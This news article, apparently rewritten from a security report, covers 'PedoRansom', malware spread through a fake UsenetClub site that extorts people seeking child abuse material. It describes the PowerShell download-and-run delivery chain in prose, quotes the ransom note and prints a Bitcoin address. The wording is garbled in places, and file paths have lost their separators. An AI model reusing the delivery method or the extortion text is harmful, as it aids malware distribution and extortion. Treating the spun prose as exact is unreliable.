You seldom empathize with a cybercriminal, however, a fresh malware crusade aiming child molesters does not arouse sympathy towards the victims.
Since 2012, malicious actors have been manufacturing various types of malware and ransomware that simulate to be governmental agencies alerting compromised Windows users of their involvement in CSAM. The malware beckons victims to pay a “fine” in order to circumvent their data from being shared with law enforcers.
Actioned in the form of one of the primary “progressive” ransomware operations, denoted Anti-Child Pornography Spam Protection (ACCDFISA), was a combination of this blackmail tactic and the preliminary lockdown of Windows desktops, followed by the subsequent encryption of files in later versions.
Successively surfaced other types of malware that simulated to be law enforcement organizations, coercively imposing fines for watching CSAM, such as Harasom, Urausy, and the Reveton trojans.
An unlikely savior
Last week, a cyber-security researcher named MalwareHunterTeam presented BleepingComputer with a sample of a malicious executable dubbed ‘CryptVPN’ [available on VirusTotal], exploiting relatively resembling extortion tactics.
Nonetheless, this time, victims are no longer commonfolk, rather, the malware developer is targeting those who actively participate in procuring child pornography.
bThrough research, BleepingComputer discovered that the threat actors built a website designed to impersonate UsenetClub, an exclusive subscription service for “uncensored” access to images and videos that are downloadable via Usenet.
Usenet as an online forum that allows its users to discuss various topics on specialized forums. While Usenet is used for legitimate discussion on a broad spectrum of matters, it remains a well-known source of child pornography.
The malicious actors generated a fake website, posing as UsenetClub, where they offer three subscription types to access the content on their site. The first two are paid subscriptions with prices ranging between $69.99/month and $279.99/year.
However, the third choice claims to provide free access upon installing a free “CryptVPN” software and deploying it to gain entry to the website.
By clicking on the “Download & Install” button, a CryptVPN.zip file is downloaded to the victim’s system which, when unzipped, contains a Windows shortcut labeled “CLICK-HERE-TO-INSTALL”.
The zip file is actually a shortcut that executes PowerShell.exe, along with commands to download the CryptVPN.exe executable, save it to C:WindowsTasks.exe and then run it.
The malicious executable is compressed with UPX, however, once decompressed, it reveals a string of PDB, indicating that the author named the malware “PedoRansom”.
C:UsersusersourcereposPedoRansomx64ReleasePedoRansom.pdb
In reality, the malware carries no unique features, it solely modifies the victim’s wallpaper to display an extortion demand and also drops a ransom note named README.TXT on the desktop, implying parallel threats of extortion.
“You have been seeking child exploitation and/or child sexual abuse material. You were ignorant enough to get hacked,” reads the extortion demand.
“We have retrieved all of your information, now you must pay us a ransom or your life is over.”
The extortion further states that the person must pay $500 to the bc1q4zfspf0s2gfmuu8h5k0679sxgxjkd7aj5e6qyl Bitcoin address within ten days otherwise their information will be disseminated. However, as of now, only around $86 have been received in payments at the given address.
Malicious actors have been exploiting “sextortion” tactics for a long time, usually deploying mass emails to a large number of recipients in an effort to coerce victims into paying the ransom. In the early campaigns, these tactics proved to be very effective, resulting in spammers receiving over $50,000 per week.
However, over time, as targets of these scams became more aware, sextortion campaigns no longer yield the same amount of profit they once did. Although this particular campaign may seem somewhat more sophisticated and have the potential to incite fear among those seeking such content, it is highly unlikely that many would comply with the extortion demands.